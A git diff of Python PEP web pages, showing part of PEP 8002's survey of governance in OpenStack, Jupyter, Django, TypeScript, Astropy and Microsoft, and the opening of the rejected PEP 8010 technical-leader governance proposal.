Policy decisions limited to a single team are usually made by the core +review team for a project, and the policies and decision processes may +vary between teams. Some groups write down their team policies in +their documentation repository, and use the code review tool (gerrit) +to vote on them. Some teams discuss policies on IRC, either ad hoc or +during a regularly scheduled meeting, and make decisions there. Some +teams use the mailing list for those discussions. The PTL for the team +is responsible for ensuring the discussion is managed and the outcome +is communicated (either by doing so directly or ensuring that the task +is delegated to someone else).

+

All team policy decisions need to be compatible with the overall +policies set by the Technical Committee. Because the TC tends to make +broader governance decisions that apply to the entire contributor +community, the process for discussing and voting on those decisions is +described more formally, including specifying the number of votes +needed to pass and the minimum length of time required for +discussion. For example, most motions require 1/3 of the members (5) +to pass and must stay open at least 3 days after receiving sufficient +votes to pass, ensuring that there is time for dissent to be +registered. See the Technical Committee Charter +and house rules +for more details.

+

Significant design decisions are usually discussed by reviewing a +specification document, somewhat +similar to a PEP, that covers the requirements, alternatives, and +implementation details. Feedback is solicited from all contributors, +and then specifications are eventually approved or rejected by members +of the core review team for a project. Some teams require only 2 +reviewers to approve a design, while other teams require a stronger +indication of consensus before a design is approved. Each team sets a +deadline for approving specifications within each development cycle, to encourage +contributors to work out designs for significant new features early +and avoid risk from changes late in the cycle.

+

Smaller technical decisions are typically made by reviewing the +patch(es) needed to implement the change. Anyone may review any patch +and provide technical feedback, but ultimately two core reviewers for +a team are needed to approve most changes (exceptions are often made +for trivial changes such as typos or for fixes that unblock the CI +gating system).

+
+
+

Controversial decision process

+

Controversial, or merely complicated, decisions frequently expand +outside of specification reviews to mailing list discussions. They +often also result in discussions at one of the regularly scheduled +in-person community gatherings. Because many members of the community +cannot attend these events, the discussions are summarized and final +decisions are made using on-line tools as much as possible.

+

The PTL is responsible for deciding when consensus has been reached +for decisions that affect a single team, and to make a final call in +rare cases where consensus has not been reached and a decision +absolutely needs to be made. The TC acts as a similar decision-making +group of last resort for cases where issues between teams cannot be +resolved in another way. Such escalation of decision-making ends up +being rarely necessary, because the contributors directly involved +generally prefer to come to a consensual agreement rather than +escalate the decision to others.

+
+
+

Planning a new release

+

OpenStack has a major release about every 6 months. These are +coordinated date-based releases, which include the work finished up to +that point in time in all of the member projects. Some project teams +release more often than every 6 months (this is especially true for +teams building libraries consumed by other teams). Those smaller +releases tend to be produced when there is content (new features or +bug fixes) to justify them.

+

The schedule for each development cycle, with deadlines and a final +release date, is proposed by the release management team, in +coordination with the Foundation staff (releases are generally aligned +with the calendar of in-person events), and then the community has an +opportunity to provide feedback before the final dates are set.

+

Decisions about priorities for each development cycle are made at the +team level and the TC level. Core review teams prioritize internal +work, such as fixing bugs and implementing new features. The TC +selects community goals, which +usually require some amount of work from all teams. Agreeing to these +priorities at the start of each cycle helps the teams coordinate their +work, which is especially important because the implementation will +require reviews from multiple team members.

+
+
+

Changes in the process over time

+

Over the last 8 years the number of OpenStack project teams has grown +from 2 to 63. The makeup of the Technical Committee has changed to +accommodate that growth. Originally the TC was made up of PTLs, but as +the membership grew it became impractical for the group to function +effectively.

+

The community also used to be organized around “program areas” rather +than project teams. A program area covered a feature set, such as +gathering telemetry or managing block storage. This organization +failed when multiple teams of people wanted to work on the same +feature set using different solutions. Organizing teams around the +code they deliver allows different teams to have different +interpretations of the same requirements. For example, there are now +several teams working on different deployment tools.

+
+
+
+

Jupyter

+

The governance structure is documented in the Main Governance Document +within the Jupyter Governance repo.

+

The effective governance process grows organically over time as the needs of +the project evolve. Formal changes to the Governance Document are submitted via +Pull Request, with an open period for comments. After the open period, the +Steering Council may call for a vote to ratify the PR changes. Acceptance +requires a minimum of 80% of the Steering Council to vote and at least 2/3 of +the vote must be positive. The BDFL can act alone to accept or reject changes +or override the Steering Council decision, though this would be an extremely +rare event.

+
+

Key people and their functions

+

The key people in Jupyter’s Governance are the BDFL, Fernando Perez, and the +Steering Council. Contributors can be given a special status of core contributor. +Some may also be Institutional Contributors, who are individuals who contribute +to the project as part of their official duties at an Institutional Partner.

+

Fernando Perez, the project founder, is the current and first BDFL. The BDFL +may serve as long as desired. The BDFL succession plan +is described in the Main Governance Document. In summary, the BDFL may appoint +the next BDFL. As a courtesy, it is expected that the BDFL will consult with the +Steering Council. In the event that the BDFL can not appoint a successor, the +Steering Council will recommend one.

+

Core contributors are individuals who are given rights, such as commit privileges, +to act in the best interest of the project within their area of expertise or +subproject. +An existing core contributor typically recommends someone be given +core contributor rights by gathering consensus from project leads, who are +experienced core contributors as listed in the README of the project repo.

+

To be recommended and invited as a Steering Council member, an individual must +be a Project Contributor who has produced contributions that are substantial in +quality and quantity, and sustained over at least one year. Potential Council +Members are nominated by existing Council members and voted upon by the +existing Council after asking if the potential Member is interested and willing +to serve in that capacity.

+
+
+

Regular decision process

+

Project Jupyter is made up of a number of GitHub organizations and subprojects within those organizations. Primary work happens via GitHub issues and pull requests. Approval of a pull request by any team member allows it to be merged without further process. All merged pull requests end up in the next stable release of a subproject.

+

There is a weekly, public Project-wide meeting that is recorded and posted on YouTube. Some larger GitHub organizations, which are subprojects of Project Jupyter, e.g. JupyterLab and JupyterHub, may have additional public team meetings on a weekly or monthly schedule. Discussions occur on Gitter, on the Jupyter mailing list, and most frequently in open issues and/or pull requests on GitHub.

+
+
+

Controversial decision process

+

The foundations of Project Jupyter’s governance are:

+
    +
  • Openness & Transparency
  • +
  • Active Contribution
  • +
  • Institutional Neutrality
  • +
+

During the everyday project activities, Steering Council members participate in all discussions, code review, and other project activities as peers with all other Contributors and the Community. In these everyday activities, Council Members do not have any special power or privilege through their membership on the Council. However, it is expected that, because of the quality and quantity of their contributions and their expert knowledge of the Project Software and Services, Council Members will provide useful guidance, both technical and in terms of project direction, to potentially less experienced contributors.

+

For controversial issues, the contributor community works together to refine +potential solutions, iterate as necessary, and build consensus by sharing +information and views constructively and openly. The Steering Council may +make decisions when regular community discussion doesn’t produce consensus +on an issue in a reasonable time frame.

+
+
+

Voting

+

Rarely, if ever, is voting done for technical decisions.

+

For other Project issues, the Steering Council may call for a vote on a decision via a Governance PR or an email proposal. Acceptance requires that a minimum of 80% of the Steering Council vote and that at least 2/3 of the votes cast be positive.
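To make the two thresholds concrete, here is a minimal sketch, not an official Jupyter tool; the function name is illustrative, and the treatment of abstentions is an assumption (only explicit yes/no votes are counted):

    from fractions import Fraction

    def proposal_accepted(council_size: int, yes: int, no: int) -> bool:
        # Quorum: at least 80% of the Steering Council must cast a vote.
        votes_cast = yes + no  # abstentions not counted (an assumption)
        if Fraction(votes_cast, council_size) < Fraction(4, 5):
            return False
        # Supermajority: at least 2/3 of the votes cast must be positive.
        return Fraction(yes, votes_cast) >= Fraction(2, 3)

    # Example: a 10-member council where 9 members vote, 7 in favor.
    assert proposal_accepted(council_size=10, yes=7, no=2)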

+

The BDFL can act alone to accept or reject changes or override the Steering Council decision, though this would be an extremely rare event. In practice, being Benevolent, the BDFL chooses to defer that authority to the consensus of the community discussion channels and the Steering Council.

+
+
+

Planning releases

+

Since Project Jupyter comprises a number of projects rather than a single one, release planning is largely driven by the core contributors of each project.

+
+
+

Changes in the process over time

+

The process has remained consistent over time, and the approach has served us well. Moving forward, the Project leadership will consist of a BDFL and a Steering Council. This governance model was a formalization of what the Project was already doing (prior to 2015, when the Main Governance Document was adopted by the Steering Council), rather than a change in direction.

+
+
+
+

Django

+

The governance structure is documented in Organization of the Django Project.

+
+

Key people and their functions

+

The project recognizes three kinds of contributors: members of the core team, the Technical Board, and Fellows. Regular core committers no longer exercise their “commit bit”; instead, they rely on pull requests being reviewed and accepted. The Technical Board steers technical choices. Fellows are hired contractors who triage new tickets and review and merge patches, including non-trivial ones, from the committers and community.

+

Core team members are added by nomination and vote within the core team, with Technical Board veto (so far not exercised). The Technical Board is elected by and from the core team membership every 18 months (every major Django release). Sub-teams within the core team are self-selected by interest.

+
+
+

Regular decision process

+

Most day-to-day decisions are made by Fellows and sometimes other active +core team members.

+

The core team votes on new members, which requires a 4/5 majority of votes cast, with no quorum requirement. The Technical Board has veto power; this power has never been exercised.

+
+
+

Controversial decision process

+

The Technical Board occasionally approves Django +Enhancement Proposals (DEPs) but those are rare. The DEP process is +roughly modeled after PEPs and documented in DEP 1. +DEPs are mostly used to design major new features, but also for +information on general guidelines and process.

+

An idea for a DEP should first be publicly vetted on the django-developers mailing list. After it has been roughly validated, the author forms a team with three roles:

+
    +
  • authors, who write the DEP and steer the discussion;
  • +
  • implementers who prepare the implementation of the DEP;
  • +
  • a shepherd who is a core developer and will be the primary reviewer +of the DEP.
  • +
+

The DEP’s draft is submitted, assigned a number, and discussed. Authors collect feedback and steer discussion as they see fit. Suggested venues for avoiding endless open-ended discussions are separate mailing lists, wiki pages, and working off of pull requests on the DEP.

+

Once the feedback round is over, the shepherd asks the Technical Board +for review and pronouncement. The Board can rule on a DEP as a team or +designate one member to review and decide.

+

In any case where consensus can’t be reached, the Technical Board has final say. This power has never been exercised.

+
+

Differences between DEPs and PEPs

+

The main difference is that the entire workflow is based on pull +requests rather than e-mail. They are pronounced upon by the Technical +Board. They need to have the key roles identified before submission +and throughout the process. The shepherd role exists to guide a DEP +to completion without engaging the Technical Board.

+

Those changes to the process make it more distributed and workable in +a governance model without a BDFL.

+
+
+
+

Planning a new release

+

Releases are done on a fixed time-based schedule, with a major version every 18 months. With paid Fellows ensuring the necessary work gets done, on-time releases are routine.

+
+
+

Changes in the process over time

+

Django originally had two BDFLs: Jacob Kaplan-Moss and Adrian Holovaty. They retired (Adrian’s post, Jacob’s post) 9 years into the project’s history. Following their stepping down, the DEP process was defined.

+
+
+
+

TypeScript

+

The governance structure is not externally documented beyond the CONTRIBUTING.md document in the main TypeScript repository.

+
+

Key people and their functions

+

There is a formal design team and a release management team working at Microsoft. The main person behind the project is currently Anders Hejlsberg, as some of the original members of the team have left the company.

+
+
+

Regular decision process

+

Microsoft, where the project is developed, has a strong planning culture, so development roadmaps are released long in advance, notes from design discussions held at Microsoft are published quickly, and meetings are sometimes broadcast using Skype.

+

External contributions are encouraged through pull requests on GitHub. Suggestions for new use cases or features are given via issues on GitHub. This serves as an ad-hoc, PEP-like process. There is some discussion over social media (Twitter) as well.

+
+
+

Controversial decision process

+

Hejlsberg is the central figure of the project in terms of language +design, synthesizing community needs into a cohesive whole. There is +no formal process to externally contribute to the design of the +language.

+

The TypeScript team filters through and integrates community suggestions. The main advantage of this setup is a strong and consistent design with dependable scheduling and execution. While there is transparency of intentions and plans, the disadvantage of this model is that community involvement is limited to pull requests and suggestions.

+
+
+

Planning a new release

+

Microsoft determines the release schedule and communicates dates and features well in advance. Nightly builds are usually stable (with a significant portion of users on this release form).

+

Versioned releases are done every 1 to 3 months, with a roadmap available on GitHub.

+
+
+

Changes in the process over time

+

TypeScript is likely the first notable project by Microsoft developed +fully in the open (versus source-available).

+

Open-sourcing of TypeScript by Microsoft was planned from the inception of the project. Before the first open release was made, the language was driven fully by needs identified by the original teams and the early in-house users. The initial open-sourcing happened via the now-defunct Microsoft CodePlex platform, which didn’t have a well-defined routine for accepting external contributions. Community engagement rose significantly after the project moved to GitHub.

+
+
+
+

Astropy

+
+

Key people and their functions

+

The Astropy Project team’s responsibilities are spread over many different +roles [1], though frequently a person will have several roles.

+

The main body overseeing the Astropy Project is the Astropy Coordination Committee (CoCo). Its key roles are dealing with any financial issues, approving new packages wanting to join the Astropy Project, approving or rejecting Astropy Proposals for Enhancement (APEs) [2], and generally anything that’s “leadership”-oriented or time-sensitive. As of this writing, the committee has four members, and it might grow or shrink as the demands on the committee change.

+
+
+

Regular decision process

+
+

Code-level decisions

+

The Astropy Project includes the core Astropy package and other +affiliated packages. For the sake of simplicity, we will avoid +discussing affiliated packages, which can have their own rules. +Therefore, everything below will concern the core Astropy package.

+

The core Astropy package is organized into sub-packages. Each sub-package has an official maintainer as well as one or more deputies, who are responsible for ensuring code is reviewed and for generally architecting the sub-package. Code-level decisions are therefore made in GitHub issues or pull requests (PRs), usually on the basis of consensus, moderated by the maintainer and deputies of that sub-package.

+

When there is specific disagreement, a majority vote of those involved in the discussion (e.g. the PR) determines the outcome, with the CoCo called on to break ties or mediate disagreements.

+
+
+

Non-code decisions

+

Non-code decisions (like sprint scheduling, bugfix release timing, etc.) are usually announced on the astropy-dev mailing list [3] with a vote-by-message format, or an “if there are no objections”-style message for highly uncontroversial items. In general, the expectation on astropy-dev is a concrete proposal on which other members are welcome to comment or vote.

+
+
+

Voting

+

Voting usually involves either using the +1/-1 format on GitHub or the +astropy-dev mailing list. There, any interested person can vote regardless +of their official role in the project, or lack thereof. Furthermore, there +is no veto mechanism for the CoCo to override decisions of the majority.

+
+
+
+

Controversial decision process

+

Simpler controversial decisions are generally discussed on the astropy-dev +mailing list [3], and after a reasonable time either there is +a clear consensus/compromise (this happens most of the time), or the CoCo +makes a decision to avoid stalling.

+

More complicated decisions follow the APE process, which is modeled after the +PEP process. Here, the CoCo makes the final decision after a discussion +period, open to everyone, has passed. Generally the CoCo would follow the +consensus or majority will.

+
+

Ethical issues

+

The Project has an Ombudsperson who ensures there is an alternate contact for sensitive issues, such as Code of Conduct violations, independent of the Coordination Committee. In practice, the CoCo, the Community engagement coordinators, and the Ombudsperson would work together privately to try to communicate with the violator to address the situation.

+
+
+
+

Planning a new release

+

The major release timing is on a fixed schedule (every 6 months); whatever +is in at that time goes in.

+
+
+

Changes in the process over time

+

The CoCo and the “Open Development” ethos came from the inception of the +Project after a series of votes by interested Python-oriented astronomers +and allied software engineers. The core results of that initial discussion +were embodied in the Vision for Astropy document [4].

+

The existence of the formal roles and most of the rest of the above came as evolutionary steps as the community grew larger, each following either the APE process or the regular process of a proposal being brought up for discussion and vote on astropy-dev [3]. In general, all evolved as a sort of ratification of already-existing practices, only after they were first tested in the wild.

+
+
+

Self-appreciation

+

The fact that anyone who has the time can step in and suggest something (usually via a PR) or vote on their preference leads to a sense that “we are all in this together” and to better-coordinated effort.

+

Additionally, the function of the CoCo as mostly a tie-breaking body means +that there’s no sense of a dictator who enforces their will, while still +giving clear points of contact for external organizations that are +leery of fully-democratic governance models.

+
+
+

References

+ +
+
+
+

Bonus: Microsoft

+

Despite the selection process for “relevant projects” described above, +it is worthwhile considering how companies that are held financially +accountable for their decisions go about making them. This is not +intended as a readily-usable model for Python, but as additional insight +that may influence the final design or selection.

+

This section is not taken from any official documentation, but has been +abstracted by Steve Dower, a current Microsoft employee, to reflect the +processes that are most applicable to individual projects in the +engineering departments. Role titles are used (and defined) rather than +identifying specific individuals, and all names are examples and should +not be taken as a precise description of the company at any particular +time in history.

+

This is also highly simplified and idealised. There are plenty of +unhealthy teams that do not look like this description, and those +typically have high attrition (people leave the team more frequently +than other teams). Teams that retain their people are usually closer to +the model described here, but ultimately everything involving humans is +imperfect and Microsoft is no exception.

+
+

Key people and their functions

+

Microsoft has a hierarchy that ultimately reports to the CEO. Below the +CEO are a number of organisations, some of which are focused on +engineering projects (as opposed to sales, marketing or other functions). +These engineering organisations roughly break down into significant +product families - for example, there has been a “Windows group”, an +“Xbox group”, and a “server and tools group”. These are typically led by +Executive Vice Presidents (EVPs), who report to the CEO.

+

Below each EVP are many Corporate Vice Presidents (CVPs), each of whom is responsible for one or more products. This level is where the hierarchy becomes relevant for the purposes of this PEP: the CEO and EVPs are rarely involved in most decision processes, but set the direction under which CVPs make decisions.

+

Each product under a CVP has a team consisting of Program Managers +(PMs) and Engineering Managers. Engineering Managers have teams of +engineers who are largely uninvolved in decision making, though may be +used as specialists in some cases. For the rest of this section, +Engineering refers to anyone from the engineering team who is +contributing with a technical-focus, and PM refers to anyone from the +program management team contributing with a customer-focus. After +decisions are made, Engineering does the implementation and testing work, +and PM validates with users that their problem has been solved.

+

(This is actually a huge simplification, to the point where some people +in these roles are offended by this characterisation. In reality, most +people in PM or Engineering do work that crosses the boundary between +the two roles, and so they should be treated as a term describing the +work that somebody is doing in the moment, rather than an identifier or +restriction for a person.)

+

Teams generally represent a feature, while the CVP represents a product. +For example, Visual Studio Code has a CVP who is ultimately responsible +for decisions about that product and its overall direction (in the context +set by their EVP). But many teams contribute features into Visual Studio +Code.

+

For complete clarity, the CEO, EVPs, and CVPs do not ever directly +modify source code. Their entire role is to provide direction for +whoever is immediately below them and to adjudicate on controversial +decisions.

+
+
+

Regular decision process

+

Changes to product code that are not visible to external users are made +solely by Engineering. Individual engineers will be assigned tasks by a +designated engineering manager, or may self-assign. Promotion to +increasingly senior positions generally reflects trust in the +individual’s decision-making ability, and more senior engineers are +trusted to make decisions with less validation from the rest of the team. +Most bugs are covered by this process (that is, fixing a user-visible +problem without changing the intended experience is an Engineering +decision).

+

Decisions affecting users of a particular feature are made by the PM team for that feature. They will use whatever data sources are available to identify an issue, experiment with alternatives, and ultimately prepare a design document. Senior members from PM and Engineering will review designs to clarify the details, and ultimately an artifact is created that the feature team agrees on. Engineering will use this artifact to implement the work, and PM will later use this artifact to validate that the original issue has been resolved.

+

Senior members of Engineering and PM teams for a feature are expected to +make decisions in the spirit of the direction set by their CVP. Teams +have regular meetings with their CVP to discuss recent decisions and +ensure consistency. Decisions that are not obviously in line with CVP +expectations are escalated to the controversial process.

+
+
+

Controversial decision process

+

When decisions require cross-team coordination, or do not obviously align with previous CVP guidance, teams will escalate decision making. Such decisions often involve changing direction, attempting to reach a new or different group of users, deprecating or removing significant features (or doing so on a short timeframe), or changes that require quick releases.

+

In general, CVPs are not intimately familiar with all aspects of the feature team’s work. As a result, the feature team must provide both a recommendation and sufficient context so that the CVP can decide without additional knowledge. Most of the time, the first attempt results in a series of questions from the CVP, which the team will research and answer before attempting the decision again at a later date.

+

Common questions asked by CVPs are:

+
    +
  • how many users are affected by this decision?
  • +
  • what is the plan for minimizing impact on current users?
  • +
  • how will the change be “sold”/described to potential users?
  • +
+

CVPs are expected to have a strong understanding of the entire field, so +that they can evaluate some questions for themselves, such as:

+
    +
  • what similar decisions have been made by other projects within Microsoft?
  • +
  • what other projects have plans that may impact this decision?
  • +
  • what similar decisions have been made by projects outside Microsoft?
  • +
  • do users need it?
  • +
  • is it in line with the direction set by their EVP?
  • +
+

Decisions made by CVPs are generally arbitrary and final, though they +typically will provide their rationale.

+
+
+

Planning a new release

+

Releases involve coordinating a number of feature teams, and so rarely +attempt to include input from all teams. A schedule will be determined +based on broader ecosystem needs, such as planned events/conferences or +opportunities to take advantage of media attention.

+

Teams are informed of the release date and the theme of the release, and they make their own plans around it following the above decision-making process. Changing the release date is considered a controversial decision.

+
+
+
+

Acknowledgements

+

Thank you to Alex Crichton from the Rust team for an extensive explanation of how the +core team governs the project.

+

Jeremy Stanley, Chris Dent, Julia Kreger, Sean McGinnis, Emmet Hikory, +and Thierry Carrez contributed to the OpenStack section.

+

The Project Jupyter Steering Council created the Main Governance Document for +Project Jupyter, and Carol Willing summarized the key points of that document +for the Jupyter section.

+

Thank you to Carl Meyer from the Django team for explaining how their project’s governance is set up.

+

The TypeScript and Swift sections were created after conversations with +Joe Pamer and Vlad Matveev. Thanks!

+

Answers about the Astropy project were kindly contributed, in significant +detail, by Erik Tollerud and reviewed by other members of the project.

+
+
+

Annex 1: Template questions

+

The following set of questions was used as a template to guide evaluation and +interaction with the surveyed projects:

+
    +
  1. Do you have any open documentation on how the governance model is set up?
  2. +
  3. What does the process look like in practice?
      +
    • Who are the key people?
    • +
    • What “special statuses” can contributors have?
    • +
    • How are they elected/how are the statuses assigned?
    • +
    • How are regular decisions made?
    • +
    • How are controversial decisions made?
    • +
    • Is there a voting mechanism? How does it work? How often do votes actually happen?
    • +
    • Is there a veto mechanism? How often was it actually used?
    • +
    +
  4. +
  5. How do you like the process?
      +
    • Which parts work well?
    • +
    • Which parts could work better?
    • +
    • When it doesn’t work well, what does it look like?
    • +
    • What would you change if it were only up to you?
    • +
    +
  6. +
  7. Related project work:
      +
    • How do you decide when a release happens and what goes into it?
    • +
    • How do you decide who gets commit access?
    • +
    • Where do you hold discussions? (GitHub, mailing lists, face-to-face meetings, and so on)
    • +
    • Do you have a RFC/PEP-like process?
    • +
    • Who has access to those discussion channels?
    • +
    • How is this access granted/revoked?
    • +
    • Who moderates those discussions?
    • +
    • Do you censure participants, and if so, how?
    • +
    +
  8. +
  9. Process evolution
      +
    • How did this process evolve historically?
    • +
    • How can it be changed in the future?
    • +
    +
  10. +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8002.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-8010/index.html b/pep-8010/index.html
new file mode 100644
index 00000000000..44227ad552d
--- /dev/null
+++ b/pep-8010/index.html
@@ -0,0 +1,405 @@
PEP 8010 – The Technical Leader Governance Model | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 8010 – The Technical Leader Governance Model

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Rejected
+
Type:
+
Informational
+
Topic:
+
Governance
+
Created:
+
24-Aug-2018
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a continuation of the singular technical project leader model, euphemistically called the Benevolent Dictator For Life (BDFL) model of Python governance, to be henceforth called in this PEP the Gracious Umpire Influencing Decisions Officer (GUIDO). This change in name reflects both the expanded view of the GUIDO as final arbiter for the Python language decision-making process in consultation with the wider development community, and the recognition that “for life”, while perhaps aspirational, is not necessarily in the best interest of the well-being of either the language or the GUIDO themselves.

+

This PEP describes:

+
    +
  • The rationale for maintaining the singular technical leader model
  • +
  • The process for how the GUIDO will be selected, elected, retained, +recalled, and succeeded;
  • +
  • The roles of the GUIDO in the Python language evolution process;
  • +
  • The term length of service;
  • +
  • The relationship of the GUIDO with a Council of Pythonistas (CoP) +that advise the GUIDO on technical matters;
  • +
  • The size, election, and roles of the CoP;
  • +
  • The decision delegation process;
  • +
  • Any changes to the PEP process to fit the new governance model;
  • +
+

This PEP does not name a new BDFL. Should this model be adopted, it +will be codified in PEP 13 along with the names of all officeholders +described in this PEP.

+
+
+

PEP Rejection

+

PEP 8010 was rejected by a core developer vote +described in PEP 8001 on Monday, December 17, 2018.

+

PEP 8016 and the governance model it describes were chosen instead.

+
+
+

Open discussion points

+

Various tweaks to the parameters of this PEP are allowed during the +governance discussion process, such as the exact size of the CoP, term +lengths of service, and voting procedures. These will be codified by +the time the PEP is ready to be voted on.

+

The voting procedures and events described in this PEP will default to +the voting method specified in PEP 8001, although as that PEP is still +in discussion at the time of this writing, this is subject to change.

+

It is allowed, and perhaps even expected, that as experience is gained +with this model, these parameters may be tweaked as future GUIDOs are +named, in order to provide for a smoother governing process.

+
+
+

Why a singular technical leader?

+

Why this model rather than any other? It comes down to “vision”. +Design by committee has many known downsides, leading to a language +that accretes new features based on the varied interests of the +contributors at the time. A famous aphorism is “a camel is a horse +designed by committee”. Can a language that is designed by committee +“hang together”? Does it feel like a coherent, self-consistent +language where the rules make sense and are easily remembered?

+

A singular technical leader can promote that vision more than a +committee can, whether that committee is small (e.g. 3 or 5 persons) +or spans the entire Python community. Every participant will have +their own vision of what “Python” is, and this can lead to indecision +or illogical choices when those individual visions are in conflict. +Should CPython be 3x faster or should we preserve the C API? That’s a +very difficult question to get consensus on, since neither choice is +right or wrong. But worse than making the wrong decision might be +accepting the status quo because no consensus could be found.

+
+
+

Flexibility

+

Degrees of flexibility are given to both the GUIDO and CoP by way of +underspecification. This PEP describes how conflicts will be +resolved, but expects all participants, including core developers, +community members, and office holders, to always have the best +interest of Python and its users at heart. The PEP assumes that +mutual respect and the best intentions will always lead to consensus, +and that the Code of Conduct governs all interactions and discussions.

+
+
+

The role of the GUIDO

+

One of the most important roles of the GUIDO is to provide an overarching, broad, coherent vision for the evolution of the Python language, spanning multiple releases. This is especially important when decisions have lasting impact and competing benefits. For example, if backward incompatible changes to the C API lead to a 2x improvement in Python performance, different community members will likely advocate convincingly on both sides of the debate, and a clear consensus may not emerge. Either choice is equally valid. In consultation with the CoP, it will be the GUIDO’s vision that guides the ultimate decision.

+

The GUIDO is the ultimate authority for decisions on PEPs and other issues, including whether any particular change is PEP-worthy. As is the case today, many (in fact, perhaps most) decisions are handled by discussion and resolution on the issue tracker, merge requests, and discussion forums, usually with input from, or led by, experts in the particular field. Where this operating procedure works perfectly well, it can continue unchanged. This also helps reduce the workload on the CoP and GUIDO, leaving only the most important decisions and the broadest view of the landscape to the central authority.

+

Similarly, should a particular change be deemed to require a PEP, but the GUIDO, in consultation with the CoP, identifies experts who have their full confidence to make the final decision, the GUIDO can name a Delegate for the PEP. While the GUIDO remains the ultimate authority, it is expected that the GUIDO will not undermine, and in fact will support, the authority of the Delegate as the final arbiter of the PEP.

+

The GUIDO has full authority to shut down unproductive discussions, ideas, and proposals when it is clear that the proposal runs counter to the long-term vision for Python. This is done with compassion for the advocates of the change, but with the health and well-being of all community members in mind. A toxic discussion on a dead-end proposal does no one any good, and it can be terminated by fiat.

+

To sum up: the GUIDO has the authority to make a final pronouncement on any topic, technical or non-technical, except for changes to the governance PEP itself.

+
+
+

Authority comes from the community

+

The GUIDO’s authority ultimately resides with the community. A rogue GUIDO who loses the confidence of the majority of the community can be recalled and a new vote conducted. This is an exceedingly rare and unlikely event, a sufficient stopgap for the worst-case scenario, and it should not be undertaken lightly. The GUIDO should not fear being deposed because of one decision, even if that decision isn’t favored by the majority of Python developers. Recall should be reserved for actions severely detrimental to the Python language or community.

+

The Council of Pythonistas (see below) has the responsibility to +initiate a vote of no-confidence.

+
+
+

Length of service and term limits

+

The GUIDO shall serve for three Python releases, approximately 4.5 years given the current release cadence. If Python’s release cadence changes, the length of the GUIDO’s term should change to 4.5 years rounded to whole releases. How the rounding is done is left to the potential release cadence PEP. After this time, a new election is held according to the procedures outlined below. There are no term limits, so the GUIDO may run for re-election for as long as they like.
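As a rough illustration of the arithmetic, here is a minimal sketch, not part of the proposal; the PEP explicitly leaves the exact rounding method to a potential release cadence PEP, so ordinary Python rounding is used here purely as an assumption:

    def guido_term_in_releases(cadence_months: int) -> int:
        # 4.5 years expressed in months, divided by the release cadence.
        # Note: Python's round() applies banker's rounding to .5 cases.
        return round(4.5 * 12 / cadence_months)

    assert guido_term_in_releases(18) == 3   # current 18-month cadence
    assert guido_term_in_releases(12) == 4   # hypothetical annual cadence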

+

We expect GUIDOs to serve out their entire term of office, but of +course, Life Happens. Should the GUIDO need to step down before their +term ends, the vacancy will be filled by the process outlined below as +per choosing a new GUIDO. However, the new GUIDO will only serve for +the remainder of the original GUIDO’s term, at which time a new +election is conducted. The GUIDO stepping down may continue to serve +until their replacement is selected.

+

During the transition period, the CoP (see below) may carry out the +GUIDO’s duties, however they may also prefer to leave substantive +decisions (such as technical PEP approvals) to the incoming GUIDO.

+
+
+

Choosing a GUIDO

+

The selection process is triggered whenever a vacancy exists for a new +GUIDO, or when the GUIDO is up for re-election in the normal course of +events. When the selection process is triggered, either by the GUIDO +stepping down, or two months before the end of the GUIDO’s regular +term, a new election process begins.

+

For three weeks prior to the vote, nominations are open. Candidates +must be chosen from the current list of core Python developers. +Non-core developers are ineligible to serve as the GUIDO. Candidates +may self-nominate, but all nominations must be seconded. Nominations +and seconds are conducted as merge requests on a private repository.

+

Once they accept their nomination, nominees may post short position +statements using the same private repository, and may also post them +to the committers discussion forum. Maybe we’ll even have debates! +This phase of the election runs for two weeks.

+

Core developers then have three weeks to vote, using the process +described in PEP 8001.

+
+
+

The Council of Pythonistas (CoP)

+

Assisting the GUIDO is a small team of elected Python experts, serving together as a technical committee. They provide insight and offer discussion of the choices before the GUIDO. Consultation can be triggered from either side. For example, if the GUIDO is still undecided about any particular choice, discussions with the CoP can help clarify the remaining issues, identify the right questions to ask, and provide insight into the impact on other users of Python that the GUIDO may not be as familiar with. The CoP are the GUIDO’s trusted advisers, and a close working relationship is expected.

+

The CoP shall consist of 3 members, elected from among the core +developers. Their term runs for 3 years and members may run for +re-election as many times as they want. To ensure continuity, CoP +members are elected on a rotating basis; every year, one CoP member is +up for re-election.

+

In order to bootstrap the stagger for the initial election, the CoP member with the most votes shall serve for 3 years, the second most popular vote-getter shall serve for 2 years, and the CoP member with the fewest votes shall initially serve for 1 year.
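As a minimal sketch of this staggering rule (candidate names and vote counts are hypothetical, and the tie-breaking procedure deferred to PEP 8001 is omitted):

    def initial_terms(votes: dict[str, int]) -> dict[str, int]:
        # Rank the three elected members by descending vote count and
        # assign initial terms of 3, 2, and 1 years respectively.
        ranked = sorted(votes, key=votes.get, reverse=True)
        return dict(zip(ranked, (3, 2, 1)))

    # Example with hypothetical candidates:
    assert initial_terms({"A": 120, "B": 95, "C": 80}) == {"A": 3, "B": 2, "C": 1}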

+

All ties in voting will be broken with a procedure to be determined in +PEP 8001.

+

The nomination and voting process is similar to that for the GUIDO. There is a three-week nomination period, where self-nominations are allowed and must be seconded, followed by a period of time for posting position statements, followed by a vote.

+

By unanimous decision, the CoP may begin a no-confidence vote on the +GUIDO, triggering the procedure in that section.

+
+
+

No confidence votes

+

As mentioned above, the CoP may, by unanimous decision, initiate a +vote of no-confidence in the GUIDO. This process should not be +undertaken lightly, but once begun, it triggers up to two votes. In +both cases, voting is done by the same procedure as in PEP 8001, and +all core developers may participate in no confidence votes.

+

The first vote is whether to recall the current GUIDO or not. Should a super majority of Python developers vote “no confidence”, the GUIDO is recalled. A second vote is then conducted to select the new GUIDO, in accordance with the procedures for the initial selection of this office holder. During the time in which there is no GUIDO, major decisions are put on hold, but normal Python operations may of course continue.

+
+
+

Day-to-day operations

+

The GUIDO is not needed for all – or even most – decisions. Python +developers already have plenty of opportunity for delegation, +responsibility, and self-direction. The issue tracker and pull +requests serve exactly the same function as they did before this +governance model was chosen. Most discussions of bug fixes and minor +improvements can just happen on these forums, as they always have.

+
+
+

PEP considerations

+

The GUIDO, members of the CoP, and anyone else in the Python community +may propose a PEP. Treatment of the prospective PEP is handled the +same regardless of the author of the PEP.

+

